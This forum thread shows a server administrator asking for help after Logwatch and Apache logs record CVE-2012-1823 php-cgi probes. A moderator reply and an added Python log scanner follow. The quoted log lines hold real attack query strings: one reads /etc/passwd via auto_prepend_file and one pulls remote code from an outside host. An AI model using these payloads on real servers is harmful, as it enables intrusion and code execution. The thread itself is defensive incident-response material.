LinuxQuestions.org
Old 10-31-2012, 10:15 AM   #1
Metux
LQ Newbie
 
Logwatch: A total of 1 possible successful probes were detected


Hi everybody, I need some help to figure out how this successful request can damage my server.

A total of 3 sites probed the server
31.186.97.13
61.12.24.55
85.192.244.22

A total of 1 possible successful probes were detected (the following URLs
contain strings that match one or more of a listing of strings that
indicate a possible exploit):

/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP Response 200

Here is what I have in /var/log/apache2/access.log:

Code:
209.135.33.180 - - [31/Oct/2012:07:01:41 +0100] "POST /?d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://rockingham911.org/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://rockingham911.org/api.gif%20-n HTTP/1.1" 200 7272 "" "Mozilla/5.0"
I don't really know what to do, so I just added this to my iptables script named "firewall":
Code:
#209.135.33.180 - - [31/Oct/2012:07:01:41 +0100] "POST /?d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://rockingham911.org/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://rockingham911.org/api.gif%20-n HTTP/1.1" 200 7272 "" "Mozilla/5.0"
iptables -A INPUT -s 209.135.33.180 -j DROP
Here is what i understood:
- /?: the ? is a flag for POST
- It's an attempt to use a rootkit
- The URL of the rootkit is here: http://rockingham911.org/api.gif%20-n
- And it uses the auto_prepend_file function to make sure he can include whatever he wants to execute his rootkit.

In my php.ini I have by default:
Code:
allow_url_include = Off

I also use a specific variable from my application that I send to my PHP files to make sure nobody else can execute my PHP files without this variable.

And I installed suPHP, so the user www-data doesn't execute PHP files anymore.
I'm sure nobody connected as root, because I send myself an email each time a user logs in to the server as root (but maybe it's not enough to be 100% sure).

Can you tell me if I did well, and explain what I can do to verify that he couldn't damage my server?

Thanks.
 
Old 10-31-2012, 12:57 PM   #2
unSpawn
Moderator
Quote:
Originally Posted by Metux
/?-d%20allow_url_include
The core issue here is CVE-2012-1823: http://www.linuxquestions.org/questi...4/#post4692267 ..

Quote:
Originally Posted by Metux
Can you tell me if i did good,
.. reading the links mentioned above shows you the relevant actions to perform, of which the first and most important one is checking your PHP version and, if vulnerable, upgrading it.
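An added example, not from this thread, from Logwatch or from PHP: a small Python scanner that applies the CGI argument-splitting rule behind CVE-2012-1823 to access.log lines, so a defender can see which requests would have reached php-cgi as command-line switches and which ini directives they tried to override. The log lines, IP addresses and host name in it are constructed placeholders, not the hosts from the thread.

```python
import re
from urllib.parse import unquote

# Constructed sample access.log lines (Apache combined format); addresses and host
# are placeholder values, not the hosts from the thread.
SAMPLE_LOG = """\
203.0.113.10 - - [31/Oct/2012:07:01:41 +0100] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://example.invalid/api.gif%20-n HTTP/1.1" 200 7272 "" "Mozilla/5.0"
198.51.100.7 - - [31/Oct/2012:08:12:03 +0100] "GET /index.php?page=home&id=3 HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
192.0.2.44 - - [31/Oct/2012:09:00:00 +0100] "GET /?-s HTTP/1.1" 404 290 "-" "curl/7.26"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# php-cgi command-line switches that CVE-2012-1823 let a query string inject.
PHP_CGI_SWITCHES = ("-d", "-s", "-n", "-c", "-i", "-f")
# ini directives that the -d override is typically aimed at.
RISKY_DIRECTIVES = ("allow_url_include", "auto_prepend_file", "auto_append_file",
                    "disable_functions", "open_basedir", "safe_mode")

def cgi_argv(query):
    # RFC 3875 section 4.4: a QUERY_STRING with no unencoded '=' is split on '+'
    # and each piece URL-decoded into an argv entry for the CGI program. An
    # encoded %3D does not count, which is why the probe in the thread uses it.
    if "=" in query:
        return []
    return [unquote(p) for p in query.split("+") if p]

def analyse_line(line):
    """Return a finding for a request shaped like a CVE-2012-1823 probe, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    argv = cgi_argv(m.group("target").partition("?")[2])
    if not any(a.startswith(PHP_CGI_SWITCHES) for a in argv):
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "method": m.group("method"),
            "status": int(m.group("status")), "argv": argv,
            "directives": [d for d in RISKY_DIRECTIVES if any(d in a for a in argv)],
            # A 200 only says the server answered; whether the injected switches
            # took effect depends on the PHP build, so still check the PHP version.
            "answered_200": m.group("status") == "200"}

def scan(log_text):
    return [f for f in map(analyse_line, log_text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["method"], f["status"], f["argv"], f["directives"])
```

A normal request such as the `/index.php?page=home&id=3` line contains an unencoded `=`, so it never becomes argv and is not flagged, while a 404 on a probe still shows up so the source address can be reviewed.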
 
Old 11-08-2012, 07:26 AM   #3
Metux
LQ Newbie
thx, I have a lot to read and learn
 
  

